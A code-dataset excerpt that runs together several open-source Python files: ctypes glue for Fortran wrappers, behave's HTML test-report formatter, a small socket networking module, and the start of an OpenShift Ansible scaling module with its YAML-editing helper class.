cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cvalue = ctype(value)
cfunc(ctypes.byref(cvalue))
return _set
def _global_allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = []
cfunc.restype = None
return cfunc
class Global(Field):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _global_getter(ctype, getter)
self.setter = _global_setter(ctype, setter, strlen)
self.allocator = _global_allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter()
except NullPointerError:
self.allocator()
return self.getter()
def __set__(self, instance, value):
if self.setter:
self.setter(value)
elif issubclass(self.ctype, FType):
try:
target = self.getter()
except NullPointerError:
self.allocator()
target = self.getter()
target.copy_from(value)
else:
raise AttributeError("Not settable.")
class FTypeFieldArray(object):
def __init__(self, field, ptr):
self.field = field
self.ptr = ptr
def __len__(self):
return self.ptr.dims[self.field.name][0]
def __getitem__(self, index):
if not isinstance(index, (list, tuple)):
return self[(index, )]
else:
return self.field.getter(self.ptr, index)
def __setitem__(self, index, value):
if not isinstance(index, (list, tuple)):
self[(index, )] = value
else:
self[index].copy_from(value)
def allocate(self, *sizes):
self.field.allocator(self.ptr, sizes)
def _array_getter(name, ctype, cfunc):
if ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = ctypes.c_char_p(0)
cfunc(instance.ptr, ctypes.byref(cindex), ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
elif issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims[name]))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = cfunc(instance.ptr, ctypes.byref(cindex))
return ctype(cptr, False)
return _get
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctype))]
cfunc.restype = None
def _get(instance):
cptr = ctypes.POINTER(ctype)()
cfunc(instance.ptr, ctypes.byref(cptr))
try:
carray = array_from_pointer(ctype, instance.dims[name], cptr)
except ValueError:
raise NullPointerError
return numpy.ndarray(instance.dims[name], ctype, carray, order='F')
return _get
def _array_setter(name, ctype, cfunc):
if ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32)), ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(instance, index, value):
cindex = (ctypes.c_int32 * len(instance.dims))(*index)
cptr = ctypes.cast(cindex, ctypes.POINTER(ctypes.c_int32))
cbuffer = ctypes.create_string_buffer(value.encode('utf-8'))
cvalue = ctypes.cast(cbuffer, ctypes.c_char_p)
cfunc(instance.ptr, ctypes.byref(cptr), ctypes.byref(cvalue))
return _set
def _array_allocator(name, ctype, cfunc):
if cfunc is None:
return
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(instance.ptr, ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(instance.ptr, ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
class ArrayField(object):
def __init__(self, name, ctype, dims, getter, setter, allocator=None, strlen=None):
self.name = name
self.ctype = ctype
self.dims = dims
self.getter = _array_getter(self.name, self.ctype, getter)
self.setter = _array_setter(self.name, self.ctype, setter)
self.allocator = _array_allocator(self.name, self.ctype, allocator)
self.strlen = strlen
def __get__(self, instance, owner):
if self.strlen is not None:
return StringFieldArray(self, instance)
elif issubclass(self.ctype, FType):
return FTypeFieldArray(self, instance)
else:
return self.getter(instance)
def __set__(self, instance, value):
if issubclass(self.ctype, FType):
array = FTypeFieldArray(self, instance)
for target, source in zip(array, value):
target.copy_from(source)
else:
try:
array = self.getter(instance)
except NullPointerError:
value = numpy.array(value)
self.allocator(instance, value.shape)
array = self.getter(instance)
array[:] = value
class StringFieldArray(FTypeFieldArray):
def __setitem__(self, index, value):
if not isinstance(index, (list, tuple)):
self[(index, )] = value
else:
self.field.setter(self.ptr, index, value)
def _global_array_getter(name, ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = ctypes.c_void_p
def _get(instance, index):
index = (ctypes.c_int32 * len(instance.dims))(*index)
cindex = ctypes.cast(index, ctypes.POINTER(ctypes.c_int32))
cptr = cfunc(ctypes.byref(cindex))
return ctype(cptr, False)
return _get
else:
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctype))]
cfunc.restype = None
def _get(instance):
cptr = ctypes.POINTER(ctype)()
cfunc(ctypes.byref(cptr))
try:
carray = array_from_pointer(ctype, instance.dims, cptr)
except ValueError:
raise NullPointerError
return numpy.ndarray(instance.dims, ctype, carray, order='F')
return _get
def _global_array_allocator(name, cfunc):
if cfunc is None:
return
cfunc.argtypes = [ctypes.POINTER(ctypes.POINTER(ctypes.c_int32))]
cfunc.restype = None
def _alloc(instance, sizes):
csizes = (ctypes.c_int32 * len(instance.dims[name]))(*sizes)
cptr = ctypes.cast(csizes, ctypes.POINTER(ctypes.c_int32))
cfunc(ctypes.byref(cptr))
instance.dims[name][:] = sizes
return _alloc
class ArrayGlobal(ArrayField):
def __init__(self, name, ctype, dims, getter, allocator=None):
self.name = name
self.ctype = ctype
self.dims = dims
self.getter = _global_array_getter(self.name, self.ctype, getter)
self.allocator = _global_array_allocator(self.name, allocator)
def __get__(self, instance, owner):
if issubclass(self.ctype, FType):
return FTypeFieldArray(self, instance)
else:
return self.getter(instance)
def __set__(self, instance, value):
if issubclass(self.ctype, FType):
array = FTypeFieldArray(self, instance)
for target, source in zip(array, value):
target.copy_from(source)
else:
try:
array = self.getter(instance)
except NullPointerError:
value = numpy.array(value)
self.allocator(instance, value.shape)
array = self.getter(instance)
array[:] = value
class FType(object):
_new = None
_free = None
def __init__(self, cptr=None, owned=None, **kwargs):
if cptr is None:
self.ptr = ctypes.c_void_p(self._new())
self.owned = owned if owned is not None else True
else:
self.ptr = cptr
self.owned = owned if owned is not None else False
self.dims = {
name: list(field.dims)
for name, field in self.fields(ArrayField)
}
for name, value in kwargs.items():
setattr(self, name, value)
def __del__(self):
if self.owned:
self.owned = False
self._free(ctypes.byref(self.ptr))
def copy_from(self, other):
for name, field in self.fields():
if isinstance(field, ArrayField):
continue
try:
value = getattr(other, name)
except (UnicodeDecodeError, ValueError, NullPointerError):
continue
setattr(self, name, value)
@classmethod
def fields(cls, types=(Field, ArrayField)):
for name, field in cls.__dict__.items():
if isinstance(field, types):
yield name, field
class F2xError(Exception):
def __init__(self, name, code):
super(Exception, self).__init__("During execution of {0} an error ({1}) occured.".format(name, code))
self.code = code
|
DLR-SC/F2x
|
src/F2x/template/ctypes_noerr/lib/glue.py
|
Python
|
apache-2.0
| 17,616 | 0.0021 |
# -*- coding: utf-8 -*-
"""
Creates a very basic one-page html file for reporting a test run.
"""
from __future__ import absolute_import
from behave.formatter.base import Formatter
from behave.formatter.css import BasicTheme
from behave.compat.collections import Counter
import xml.etree.ElementTree as ET
import base64
def _valid_XML_char_ordinal(i):
return ( # conditions ordered by presumed frequency
0x20 <= i <= 0xD7FF
or i in (0x9, 0xA, 0xD)
or 0xE000 <= i <= 0xFFFD
or 0x10000 <= i <= 0x10FFFF
)
def ET_tostring(elem, pretty_print=False):
text = ET.tostring(elem, "utf-8")
if pretty_print:
pass
return text
class JavaScriptLibrary(object):
collapsible = """
function collapsible_toggle(id)
{
var elem = document.getElementById(id);
elem.style.display = (elem.style.display == 'none' ? 'block' : 'none');
return false;
}
function collapsible_expandAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'block';
i++
}
}
function collapsible_collapseAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'none';
i++
}
}
"""
class Page(object):
"""
Provides a HTML page construct (as technological layer).
XXX
"""
theme = BasicTheme
def __init__(self, title=None):
pass
# -----------------------------------------------------------------------------
# CLASS: HTMLFormatter
# -----------------------------------------------------------------------------
class HTMLFormatter(Formatter):
"""
Provides a single-page HTML formatter that writes the result of a test run.
"""
name = 'html'
description = 'Basic HTML formatter'
title = u"Behave Test Report"
def __init__(self, stream_opener, config):
super(HTMLFormatter, self).__init__(stream_opener, config)
# -- XXX-JE-PREPARED-BUT-DISABLED:
# XXX Seldom changed value.
# XXX Should only be in configuration-file in own section "behave.formatter.html" ?!?
# XXX Config support must be provided.
# XXX REASON: Don't clutter behave config-space w/ formatter/plugin related config data.
# self.css = self.default_css
# if config.css is not None:
# self.css = config.css
self.html = ET.Element('html')
head = ET.SubElement(self.html, 'head')
ET.SubElement(head, 'title').text = self.title
ET.SubElement(head, 'meta', {'content': 'text/html;charset=utf-8'})
style = ET.SubElement(head, 'style', type=u"text/css")
style.text = Page.theme.stylesheet_text
# style.append(ET.Comment(Page.theme.stylesheet_text))
script = ET.SubElement(head, 'script', type=u"text/javascript")
script.text = JavaScriptLibrary.collapsible
# script_text = ET.Comment(JavaScriptLibrary.collapsible)
# script.append(script_text)
self.stream = self.open()
body = ET.SubElement(self.html, 'body')
self.suite = ET.SubElement(body, 'div', {'class': 'behave'})
#Summary
self.header = ET.SubElement(self.suite, 'div', id='behave-header')
label = ET.SubElement(self.header, 'div', id='label')
ET.SubElement(label, 'h1').text = self.title
summary = ET.SubElement(self.header, 'div', id='summary')
totals = ET.SubElement(summary, 'p', id='totals')
self.current_feature_totals = ET.SubElement(totals, 'p', id='feature_totals')
self.scenario_totals = ET.SubElement(totals, 'p', id='scenario_totals')
self.step_totals = ET.SubElement(totals, 'p', id='step_totals')
self.duration = ET.SubElement(summary, 'p', id='duration')
# -- PART: Expand/Collapse All
expand_collapse = ET.SubElement(summary, 'div', id='expand-collapse')
expander = ET.SubElement(expand_collapse, 'a', id='expander', href="#")
expander.set('onclick', "collapsible_expandAll('scenario_steps')")
expander.text = u'Expand All'
cea_spacer = ET.SubElement(expand_collapse, 'span')
cea_spacer.text = u" | "
collapser = ET.SubElement(expand_collapse, 'a', id='collapser', href="#")
collapser.set('onclick', "collapsible_collapseAll('scenario_steps')")
collapser.text = u'Collapse All'
self.embed_id = 0
self.embed_in_this_step = None
self.embed_data = None
self.embed_mime_type = None
self.scenario_id = 0
def feature(self, feature):
if not hasattr(self, "all_features"):
self.all_features = []
self.all_features.append(feature)
self.current_feature = ET.SubElement(self.suite, 'div', {'class': 'feature'})
if feature.tags:
tags_element = ET.SubElement(self.current_feature, 'span', {'class': 'tag'})
tags_element.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), feature.tags)
h2 = ET.SubElement(self.current_feature, 'h2')
feature_element = ET.SubElement(h2, 'span', {'class': 'val'})
feature_element.text = u'%s: %s' % (feature.keyword, feature.name)
if feature.description:
description_element = ET.SubElement(self.current_feature, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), feature.description)
def background(self, background):
self.current_background = ET.SubElement(self.suite, 'div', {'class': 'background'})
h3 = ET.SubElement(self.current_background, 'h3')
ET.SubElement(h3, 'span', {'class': 'val'}).text = \
u'%s: %s' % (background.keyword, background.name)
self.steps = ET.SubElement(self.current_background, 'ol')
def scenario(self, scenario):
if scenario.feature not in self.all_features:
self.all_features.append(scenario.feature)
self.scenario_el = ET.SubElement(self.suite, 'div', {'class': 'scenario'})
scenario_file = ET.SubElement(self.scenario_el, 'span', {'class': 'scenario_file'})
scenario_file.text = "%s:%s" % (scenario.location.filename, scenario.location.line)
if scenario.tags:
tags = ET.SubElement(self.scenario_el, 'span', {'class': 'tag'})
tags.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), scenario.tags)
self.scenario_name = ET.SubElement(self.scenario_el, 'h3')
span = ET.SubElement(self.scenario_name, 'span', {'class': 'val'})
span.text = u'%s: %s' % (scenario.keyword, scenario.name)
if scenario.description:
description_element = ET.SubElement(self.scenario_el, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), scenario.description)
self.steps = ET.SubElement(self.scenario_el, 'ol',
{'class': 'scenario_steps',
'id': 'scenario_%s' % self.scenario_id})
self.scenario_name.set("onclick",
"collapsible_toggle('scenario_%s')" % self.scenario_id)
self.scenario_id += 1
def scenario_outline(self, outline):
self.scenario(self, outline)
self.scenario_el.set('class', 'scenario outline')
def match(self, match):
self.arguments = match.arguments
if match.location:
self.location = "%s:%s" % (match.location.filename, match.location.line)
else:
self.location = "<unknown>"
def step(self, step):
self.arguments = None
self.embed_in_this_step = None
self.last_step = step
def result(self, result):
self.last_step = result
step = ET.SubElement(self.steps, 'li', {'class': 'step %s' % result.status})
step_name = ET.SubElement(step, 'div', {'class': 'step_name'})
keyword = ET.SubElement(step_name, 'span', {'class': 'keyword'})
keyword.text = result.keyword + u' '
if self.arguments:
text_start = 0
for argument in self.arguments:
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name[text_start:argument.start]
ET.SubElement(step_text, 'b').text = str(argument.value)
text_start = argument.end
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name[self.arguments[-1].end:]
else:
step_text = ET.SubElement(step_name, 'span', {'class': 'step val'})
step_text.text = result.name
step_file = ET.SubElement(step, 'div', {'class': 'step_file'})
ET.SubElement(step_file, 'span').text = self.location
self.last_step_embed_span = ET.SubElement(step, 'span')
self.last_step_embed_span.set('class', 'embed')
if result.text:
message = ET.SubElement(step, 'div', {'class': 'message'})
pre = ET.SubElement(message, 'pre', {'style': 'white-space: pre-wrap;'})
pre.text = result.text
if result.table:
table = ET.SubElement(step, 'table')
tr = ET.SubElement(table, 'tr')
for heading in result.table.headings:
ET.SubElement(tr, 'th').text = heading
for row in result.table.rows:
tr = ET.SubElement(table, 'tr')
for cell in row.cells:
ET.SubElement(tr, 'td').text = cell
if result.error_message:
self.embed_id += 1
link = ET.SubElement(step, 'a', {'class': 'message'})
link.set("onclick",
"collapsible_toggle('embed_%s')" % self.embed_id)
link.text = u'Error message'
embed = ET.SubElement(step, 'pre',
{'id': "embed_%s" % self.embed_id,
'style': 'display: none; white-space: pre-wrap;'})
cleaned_error_message = ''.join(
c for c in result.error_message if _valid_XML_char_ordinal(ord(c))
)
embed.text = cleaned_error_message
embed.tail = u' '
if result.status == 'failed':
style = 'background: #C40D0D; color: #FFFFFF'
self.scenario_name.set('style', style)
self.header.set('style', style)
if result.status == 'undefined':
style = 'background: #FAF834; color: #000000'
self.scenario_name.set('style', style)
self.header.set('style', style)
if hasattr(self, 'embed_in_this_step') and self.embed_in_this_step:
self._doEmbed(self.last_step_embed_span,
self.embed_mime_type,
self.embed_data,
self.embed_caption)
self.embed_in_this_step = None
def _doEmbed(self, span, mime_type, data, caption):
self.embed_id += 1
link = ET.SubElement(span, 'a')
link.set("onclick", "collapsible_toggle('embed_%s')" % self.embed_id)
if 'video/' in mime_type:
if not caption:
caption = u'Video'
link.text = unicode(caption)
embed = ET.SubElement(span, 'video',
{'id': 'embed_%s' % self.embed_id,
'style': 'display: none',
'width': '320',
'controls': ''})
embed.tail = u' '
ET.SubElement(embed, 'source', {
'src': u'data:%s;base64,%s' % (mime_type, base64.b64encode(data)),
'type': '%s; codecs="vp8 vorbis"' % mime_type})
if 'image/' in mime_type:
if not caption:
caption = u'Screenshot'
link.text = unicode(caption)
embed = ET.SubElement(span, 'img', {
'id': 'embed_%s' % self.embed_id,
'style': 'display: none',
'src': u'data:%s;base64,%s' % (
mime_type, base64.b64encode(data))})
embed.tail = u' '
if 'text/' in mime_type:
if not caption:
caption = u'Data'
link.text = unicode(caption)
cleaned_data = ''.join(
c for c in data if _valid_XML_char_ordinal(ord(c))
)
embed = ET.SubElement(span, 'pre',
{'id': "embed_%s" % self.embed_id,
'style': 'display: none'})
embed.text = cleaned_data
embed.tail = u' '
def embedding(self, mime_type, data, caption=None):
if self.last_step.status == 'untested':
# Embed called during step execution
self.embed_in_this_step = True
self.embed_mime_type = mime_type
self.embed_data = data
self.embed_caption = caption
else:
# Embed called in after_*
self._doEmbed(self.last_step_embed_span, mime_type, data, caption)
def close(self):
if not hasattr(self, "all_features"):
self.all_features = []
self.duration.text =\
u"Finished in %0.1f seconds" %\
sum(map(lambda x: x.duration, self.all_features))
# Filling in summary details
result = []
statuses = map(lambda x: x.status, self.all_features)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.current_feature_totals.text = u'Features: %s' % ', '.join(result)
result = []
scenarios_list = map(lambda x: x.scenarios, self.all_features)
scenarios = []
if len(scenarios_list) > 0:
scenarios = reduce(lambda a, b: a + b, scenarios_list)
statuses = map(lambda x: x.status, scenarios)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.scenario_totals.text = u'Scenarios: %s' % ', '.join(result)
result = []
step_list = map(lambda x: x.steps, scenarios)
steps = []
if step_list:
steps = reduce(lambda a, b: a + b, step_list)
statuses = map(lambda x: x.status, steps)
status_counter = Counter(statuses)
for k in status_counter:
result.append('%s: %s' % (k, status_counter[k]))
self.step_totals.text = u'Steps: %s' % ', '.join(result)
# Sending the report to stream
if len(self.all_features) > 0:
self.stream.write(u"<!DOCTYPE HTML>\n")
self.stream.write(ET_tostring(self.html, pretty_print=True))
|
kymbert/behave
|
behave/formatter/html.py
|
Python
|
bsd-2-clause
| 15,092 | 0.001789 |
import socket, subprocess, re, tools, custom
#This file explains how sockets work for networking.
MAX_MESSAGE_SIZE = 60000
def kill_processes_using_ports(ports):
popen = subprocess.Popen(['netstat', '-lpn'],
shell=False,
stdout=subprocess.PIPE)
(data, err) = popen.communicate()
pattern = "^tcp.*((?:{0})).* (?P<pid>[0-9]*)/.*$"
pattern = pattern.format(')|(?:'.join(ports))
prog = re.compile(pattern)
for line in data.split('\n'):
match = re.match(prog, line)
if match:
pid = match.group('pid')
subprocess.Popen(['kill', '-9', pid])
def serve_forever(message_handler_func, PORT, queue):
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', PORT))
server.listen(100)
while True:
client, addr = server.accept()
(ip, port) = addr
data = client.recv(MAX_MESSAGE_SIZE)
#we could insert security checks here
try:
data=tools.unpackage(data)
client.send(tools.package(message_handler_func(data, queue)))
except: pass
def connect(msg, host, port):
if len(msg)<1 or len(msg)>MAX_MESSAGE_SIZE:
print('wrong sized message')
return
s = socket.socket()
try:
s.settimeout(4)
s.connect((str(host), int(port)))
msg['version']=custom.version
s.send(tools.package(msg))
response = s.recv(MAX_MESSAGE_SIZE)
#print(response)
return tools.unpackage(response)
except Exception as e:
#print('THE ERROR WAS: ' +str(e))
#print('disconnect')
return {'error':e}
def send_command(peer, msg): return connect(msg, peer[0], peer[1])
|
zack-bitcoin/forumcoin
|
networking.py
|
Python
|
gpl-3.0
| 1,788 | 0.009508 |
#!/usr/bin/env python
# pylint: disable=missing-docstring
# flake8: noqa: T001
# ___ ___ _ _ ___ ___ _ _____ ___ ___
# / __| __| \| | __| _ \ /_\_ _| __| \
# | (_ | _|| .` | _|| / / _ \| | | _|| |) |
# \___|___|_|\_|___|_|_\/_/_\_\_|_|___|___/_ _____
# | \ / _ \ | \| |/ _ \_ _| | __| \_ _|_ _|
# | |) | (_) | | .` | (_) || | | _|| |) | | | |
# |___/ \___/ |_|\_|\___/ |_| |___|___/___| |_|
#
# Copyright 2016 Red Hat, Inc. and/or its affiliates
# and other contributors as indicated by the @author tags.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- -*- -*- Begin included fragment: lib/import.py -*- -*- -*-
'''
OpenShiftCLI class that wraps the oc commands in a subprocess
'''
# pylint: disable=too-many-lines
from __future__ import print_function
import atexit
import copy
import fcntl
import json
import time
import os
import re
import shutil
import subprocess
import tempfile
# pylint: disable=import-error
try:
import ruamel.yaml as yaml
except ImportError:
import yaml
from ansible.module_utils.basic import AnsibleModule
# -*- -*- -*- End included fragment: lib/import.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: doc/scale -*- -*- -*-
DOCUMENTATION = '''
---
module: oc_scale
short_description: Manage openshift services through the scale parameters
description:
- Manage openshift services through scaling them.
options:
state:
description:
- State represents whether to scale or list the current replicas
required: true
default: present
choices: ["present", "list"]
aliases: []
kubeconfig:
description:
- The path for the kubeconfig file to use for authentication
required: false
default: /etc/origin/master/admin.kubeconfig
aliases: []
debug:
description:
- Turn on debug output.
required: false
default: False
aliases: []
name:
description:
- Name of the object that is being queried.
required: false
default: None
aliases: []
namespace:
description:
- The namespace where the object lives.
required: false
default: default
aliases: []
kind:
description:
- The kind of object to scale.
required: false
default: None
choices:
- rc
- dc
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: scale down a rc to 0
oc_scale:
name: my-replication-controller
kind: rc
namespace: openshift-infra
replicas: 0
- name: scale up a deploymentconfig to 2
oc_scale:
name: php
kind: dc
namespace: my-php-app
replicas: 2
'''
# -*- -*- -*- End included fragment: doc/scale -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods,too-many-instance-attributes
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup_ext=None,
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
if backup_ext is None:
self.backup_ext = ".{}".format(time.strftime("%Y%m%dT%H%M%S"))
else:
self.backup_ext = backup_ext
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def remove_entry(data, key, index=None, value=None, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
if value is not None:
data.pop(value)
elif index is not None:
raise YeditException("remove_entry for a dictionary does not have an index {}".format(index))
else:
data.clear()
return True
elif key == '' and isinstance(data, list):
ind = None
if value is not None:
try:
ind = data.index(value)
except ValueError:
return False
elif index is not None:
ind = index
else:
del data[:]
if ind is not None:
data.pop(ind)
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key:
if isinstance(data, dict) and dict_key in data and data[dict_key]: # noqa: E501
data = data[dict_key]
continue
elif data and not isinstance(data, dict):
raise YeditException("Unexpected item type found while going through key " +
"path: {} (at key: {})".format(key, dict_key))
data[dict_key] = {}
data = data[dict_key]
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
raise YeditException("Unexpected item type found while going through key path: {}".format(key))
if key == '':
data = item
# process last index for add
# expected list entry
elif key_indexes[-1][0] and isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
data[int(key_indexes[-1][0])] = item
# expected dict entry
elif key_indexes[-1][1] and isinstance(data, dict):
data[key_indexes[-1][1]] = item
# didn't add/update to an existing list, nor add/update key to a dict
# so we must have been provided some syntax like a.b.c[<int>] = "data" for a
# non-existent array
else:
raise YeditException("Error adding to object at path: {}".format(key))
return data
@staticmethod
def get_entry(data, key, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a.b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
return data
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
tmp_filename = filename + '.yedit'
with open(tmp_filename, 'w') as yfd:
fcntl.flock(yfd, fcntl.LOCK_EX | fcntl.LOCK_NB)
yfd.write(contents)
fcntl.flock(yfd, fcntl.LOCK_UN)
os.rename(tmp_filename, filename)
def write(self):
''' write to file '''
if not self.filename:
raise YeditException('Please specify a filename.')
if self.backup and self.file_exists():
shutil.copy(self.filename, '{}{}'.format(self.filename, self.backup_ext))
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripDumper if supported.
if self.content_type == 'yaml':
try:
Yedit._write(self.filename, yaml.dump(self.yaml_dict, Dumper=yaml.RoundTripDumper))
except AttributeError:
Yedit._write(self.filename, yaml.safe_dump(self.yaml_dict, default_flow_style=False))
elif self.content_type == 'json':
Yedit._write(self.filename, json.dumps(self.yaml_dict, indent=4, sort_keys=True))
else:
raise YeditException('Unsupported content_type: {}.'.format(self.content_type) +
'Please specify a content_type of yaml or json.')
return (True, self.yaml_dict)
def read(self):
''' read from file '''
# check if it exists
if self.filename is None or not self.file_exists():
return None
contents = None
with open(self.filename) as yfd:
contents = yfd.read()
return contents
def file_exists(self):
''' return whether file exists '''
if os.path.exists(self.filename):
return True
return False
def load(self, content_type='yaml'):
''' return yaml file '''
contents = self.read()
if not contents and not self.content:
return None
if self.content:
if isinstance(self.content, dict):
self.yaml_dict = self.content
return self.yaml_dict
elif isinstance(self.content, str):
contents = self.content
# check if it is yaml
try:
if content_type == 'yaml' and contents:
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
# Try to use RoundTripLoader if supported.
try:
self.yaml_dict = yaml.load(contents, yaml.RoundTripLoader)
except AttributeError:
self.yaml_dict = yaml.safe_load(contents)
# Try to set format attributes if supported
try:
self.yaml_dict.fa.set_block_style()
except AttributeError:
pass
elif content_type == 'json' and contents:
self.yaml_dict = json.loads(contents)
except yaml.YAMLError as err:
# Error loading yaml or json
raise YeditException('Problem with loading yaml file. {}'.format(err))
return self.yaml_dict
def get(self, key):
''' get a specified key'''
try:
entry = Yedit.get_entry(self.yaml_dict, key, self.separator)
except KeyError:
entry = None
return entry
def pop(self, path, key_or_item):
''' remove a key, value pair from a dict or an item for a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
